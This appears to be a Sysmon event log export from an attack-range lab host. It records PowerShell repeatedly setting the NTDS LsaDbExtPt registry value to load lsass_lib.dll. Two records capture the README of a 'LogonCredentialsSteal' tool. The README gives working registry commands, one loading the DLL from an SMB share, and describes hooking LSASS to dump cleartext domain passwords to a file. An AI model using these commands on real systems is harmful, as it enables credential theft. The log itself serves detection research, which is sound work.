Sysmon event records from channel Microsoft-Windows-Sysmon/Operational on computer win-host-mhaag-attack-range-117 (RuleName "-" on every record). Common header fields on all records: Version 2, Level 4, Opcode 0, Keywords 0x8000000000000000. Records are listed newest first, as exported.

Record 1 - Event ID 13 (Registry value set), Task 13, EventRecordID 30410422
  EventType:    SetValue
  UtcTime:      2022-08-23 02:38:39.084
  ProcessGuid:  {C2494F38-3DAE-6304-7E0C-000000006602}
  ProcessId:    6096
  Image:        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  TargetObject: HKLM\System\CurrentControlSet\Services\NTDS\LsaDbExtPt
  Details:      C:\Users\ADMINI~1\AppData\Local\Temp\2\lsass_lib.dll
  User:         WIN-HOST-MHAAG-\Administrator

Record 2 - Event ID 12 (Registry object added or deleted), Task 12, EventRecordID 30407303
  EventType:    DeleteValue
  UtcTime:      2022-08-23 02:37:07.390
  ProcessGuid:  {C2494F38-3D53-6304-600C-000000006602}
  ProcessId:    3956
  Image:        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  TargetObject: HKLM\System\CurrentControlSet\Services\NTDS\LsaDbExtPt
  User:         WIN-HOST-MHAAG-\Administrator

Record 3 - Event ID 13 (Registry value set), Task 13, EventRecordID 30406873
  EventType:    SetValue
  UtcTime:      2022-08-23 02:36:59.600
  ProcessGuid:  {C2494F38-3D4B-6304-5C0C-000000006602}
  ProcessId:    8544
  Image:        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  TargetObject: HKLM\System\CurrentControlSet\Services\NTDS\LsaDbExtPt
  Details:      C:\Users\ADMINI~1\AppData\Local\Temp\2\lsass_lib.dll
  User:         WIN-HOST-MHAAG-\Administrator

Record 4 - Event ID 12 (Registry object added or deleted), Task 12, EventRecordID 30406468
  EventType:    DeleteValue
  UtcTime:      2022-08-23 02:36:53.911
  ProcessGuid:  {C2494F38-3D45-6304-580C-000000006602}
  ProcessId:    8984
  Image:        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  TargetObject: HKLM\System\CurrentControlSet\Services\NTDS\LsaDbExtPt
  User:         WIN-HOST-MHAAG-\Administrator

Record 5 - Event ID 13 (Registry value set), Task 13, EventRecordID 30064068
  EventType:    SetValue
  UtcTime:      2022-08-22 21:23:29.378
  ProcessGuid:  {C2494F38-F3D1-6303-D700-000000006502}
  ProcessId:    4584
  Image:        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  TargetObject: HKLM\System\CurrentControlSet\Services\NTDS\LsaDbExtPt
  Details:      c:\temp\lsass_lib.dll
  User:         WIN-HOST-MHAAG-\Administrator

Record 6 - Event ID 12 (Registry object added or deleted), Task 12, EventRecordID 30063501
  EventType:    DeleteValue
  UtcTime:      2022-08-22 21:23:20.065
  ProcessGuid:  {C2494F38-F3C7-6303-D000-000000006502}
  ProcessId:    4892
  Image:        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  TargetObject: HKLM\System\CurrentControlSet\Services\NTDS\LsaDbExtPt
  User:         WIN-HOST-MHAAG-\Administrator

Record 7 - Event ID 13 (Registry value set), Task 13, EventRecordID 29877135
  EventType:    SetValue
  UtcTime:      2022-08-22 20:18:30.692
  ProcessGuid:  {C2494F38-4F6C-62FD-B90D-000000006302}
  ProcessId:    5632
  Image:        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  TargetObject: HKLM\System\CurrentControlSet\Services\NTDS\LsaDbExtPt
  Details:      c:\temp\lsass_lib.dll
  User:         WIN-HOST-MHAAG-\Administrator

Record 8 - Event ID 15 (FileCreateStreamHash), Task 15, EventRecordID 29869588
  UtcTime:         2022-08-22 20:17:16.263
  ProcessGuid:     {C2494F38-3D99-62FD-2B0B-000000006302}
  ProcessId:       2664
  Image:           C:\Windows\Explorer.EXE
  TargetFilename:  C:\Users\Administrator\Downloads\LogonCredentialsSteal-master\LogonCredentialsSteal-master\lsass_lib\README.TXT
  CreationUtcTime: 2020-01-27 07:11:08.000
  Hash:            MD5=45CF3AE26C0F27DA309A238097D42737,SHA256=7ED7DF78D862644779AE02A5732A0A5C00D9911E87615CE7AF3F848F2E4240ED
  Contents (captured file text, reproduced as written in the file):
    LOCAL AND REMOTE HOOK msv1_0!SpAcceptCredentials from LSASS.exe and DUMP DOMAIN/LOGIN/PASSWORD IN CLEARTEXT to text file.
    run powershell v1.0
    New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "c:\temp\lsass_lib.dll"
    New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "\\share\lulz\lsass_lib.dll"
    or
    To load our DLL, we can use a very simple Impacket Python script to modify the registry and add a key to HKLM\SYSTEM\CurrentControlSet\Services\NTDS\DirectoryServiceExtPt pointing to our DLL hosted on an open SMB share, and then trigger the loading of the DLL using a call to hSamConnect RPC call.
    look in remote_inject.py
    will inject lib and dump any logon credentials to c:\temp\credentials.txt
  User:            WIN-HOST-MHAAG-\Administrator

Record 9 - Event ID 15 (FileCreateStreamHash), Task 15, EventRecordID 29869566
  UtcTime:         2022-08-22 20:17:16.232
  ProcessGuid:     {C2494F38-3D99-62FD-2B0B-000000006302}
  ProcessId:       2664
  Image:           C:\Windows\Explorer.EXE
  TargetFilename:  C:\Users\Administrator\Downloads\LogonCredentialsSteal-master\LogonCredentialsSteal-master\README.md
  CreationUtcTime: 2020-01-27 07:11:08.000
  Hash:            MD5=2C8AF1CFD15B7941FF97470771F7AAB3,SHA256=017F23714E2D137C5097D32B531C0AE6388FAD40C8FA5EC22F841B0229D23AD6
  Contents (captured file text, reproduced as written in the file):
    # LogonCredentialsSteal
    LOCAL AND REMOTE HOOK msv1_0!SpAcceptCredentials from LSASS.exe and DUMP DOMAIN/LOGIN/PASSWORD IN CLEARTEXT to text file.
    run powershell v1.0
    New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "c:\temp\lsass_lib.dll"
    New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NTDS -Name LsaDbExtPt -Value "\\\\share\lulz\lsass_lib.dll"
    or
    To load our DLL, we can use a very simple Impacket Python script to modify the registry and add a key to HKLM\SYSTEM\CurrentControlSet\Services\NTDS\DirectoryServiceExtPt pointing to our DLL hosted on an open SMB share, and then trigger the loading of the DLL using a call to hSamConnect RPC call.
    look in remote_inject.py
    will inject lib and dump any logon credentials to c:\temp\credentials.txt
    thanks https://ired.team/ for research
  User:            WIN-HOST-MHAAG-\Administrator